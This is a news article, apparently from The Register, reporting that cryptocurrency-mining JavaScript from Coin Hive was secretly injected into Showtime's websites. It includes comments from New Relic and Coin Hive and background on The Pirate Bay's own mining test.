CBS's Showtime caught mining crypto-coins in viewers' web browsers

Who placed the JavaScript code on two primetime dot-coms? So far, it's a mystery

Got Tips? 38

The websites of US telly giant CBS's Showtime contained JavaScript that secretly commandeered viewers' web browsers over the weekend to mine cryptocurrency.

The flagship and its instant-access sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Code Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Code-Hive-hosted scripts adds up and is transferred from Coin Hive to the site's administrators. One Monero coin, 1 XMR, is worth about $92 right now.

However, it's extremely unlikely that a large corporation like CBS would smuggle such a piece of mining code onto its dot-coms – especially since it charges subscribers to watch the hit TV shows online – suggesting someone hacked the websites' source code to insert the mining JavaScript and make a quick buck.

The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems.

Here's a screenshot of the code on, seen by El Reg before it was removed. The mining script was loaded early on the page, we note.

Click to enlarge

And on Showtime Anytime:

Click to enlarge

We contacted both Showtime and New Relic today asking for more details. Showtime refused to comment. New Relic told us it had nothing to do with the mystery code.

"We take the security of our browser agent extremely seriously and have multiple controls in place to detect malicious or unauthorized modification of its script at various points along its development and deployment pipeline," New Relic's Andrew Schmitt told us.

"Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic's agents. It appears they were added to the website by its developers."

We also asked Code Hive for details on the user account the injected code was mining for. "We can't give out any specific information about the account owner as per our privacy terms," the outfit informed us. "We don't know much about these keys or the user they belong to anyway."

The outfit did confirm to us, however, that the email address used to set up the account was a personal one, and was not an official CBS email address, further suggesting malicious activity.

Pirate Bay

Coin Hive's mining code was at the center of some attention last week when file-sharing search engine The Pirate Bay admitted it had added the coin-gathering JavaScript on its pages in order to test its profitability in an effort to get rid of ads on its site.

The code was poorly configured – web admins are allowed to set the hashing rate – and resulted in people's machines slowing to a crawl, sparking complaints. Following the outcry, The Pirate Bay acknowledged the presence of the mining script, calling it "only a test" and promised to limit the CPU usage to make it less annoying. A few days later, the organization dropped the idea all together.

Pirate Bay digs itself a new hole: Mining alt-coin in slurper browsers


Code Hive not only offers in-page mining but also mining through URL shorteners and CAPTCHAs. The huge advantage to the website operator using the code is that not only does the script use someone else's processing power but also their electricity, meaning that you can make money with very little effort. So long as you are willing to annoy your visitors.

Coin Hive's pitch is that this script could allowed publishers to pull annoying ads from their website – which is something that could become more important as browsers increasingly block ads.

However, the code has already been inserted in browser extensions and on typosquatted websites. And now, it looks as though someone may have tried to hack Showtime's website in order to insert the code and make money while not having any direct impact on the website itself.

If Coin Hive wants to be seen as legitimate rather than a tool for hackers and malware authors, it is going to have to rapidly figure out a better authorization system for big websites and work on making itself less attractive to scammers. Meanwhile, ad blocking tools are now killing the JavaScript on sight. ®

Hat tip to Troy Mursch for alerting us to this mystery.

Sign up to our NewsletterGet IT in your inbox daily


Keep Reading

Google, YouTube, Twitter tell face-rec upstart Clearview to stop harvesting people's content – that's their job

Updated Tech-for-cops CEO claims First Amendment rights as a legal defense

Whoa, someone actually texted you in 2020? Oh, nvm, it's just Boris Johnson, telling you to stay the f**k at home

UK lacks formal emergency messaging system, so Big 4 carriers helped out

CBS boss says he'll show off his crown jewels on Apple TV – for a large enough check

Only a matter of time before network succumbs to Cupertino

Super Bowl's SUPER BALLSUP: CBS broadcasts Wi-Fi password

Not so top secret, huh?

Someone needs to go back to school: Texas district fleeced for $2.3m after staff fall for devious phishing email

FBI probes massive fraud

Pro tip: Plug in your Tesla S when clocking off, lest you run out of juice mid hot pursuit

San Francisco copper learns the hard way

CBS goes OTT, releases EVERY EPISODE of Star Trek EVER MADE

$5.99 a month will buy you current primetime shows too

Now that's integrity: Bloke sinks 7 beers, turns himself in. Cops weren't looking for him

But that didn't stop them arresting him for being drunk

CBS supremo: Apple TV is still dead to me, just like ...

Shan't be prying it out of anyone's hands

Aereo streaming TV now bargaining chip in Time Warner Cable, CBS tiff

Time: 'You want 600% more for content? We'll send our boob tube addicts to Aereo'

Tech Resources

CEO Fraud Prevention Manual

CEO fraud has ruined the careers of many executives and loyal employees. Don’t be one of them.

Navigating the New Normal: Cyber & Cloud Best Practices

As communities around the world start to discuss reopening, it poses a lot of questions for organizations.

Five Reasons Why OneDrive Endpoints Need Third-party Data Protection

Relying on OneDrive for data protection can expose your organization to substantial risks.

Dark Reading Report: The State of IT Operations & Cybersecurity Operations

Your enterprise’s cyber risk may depend upon the relationship between the IT team and the security team.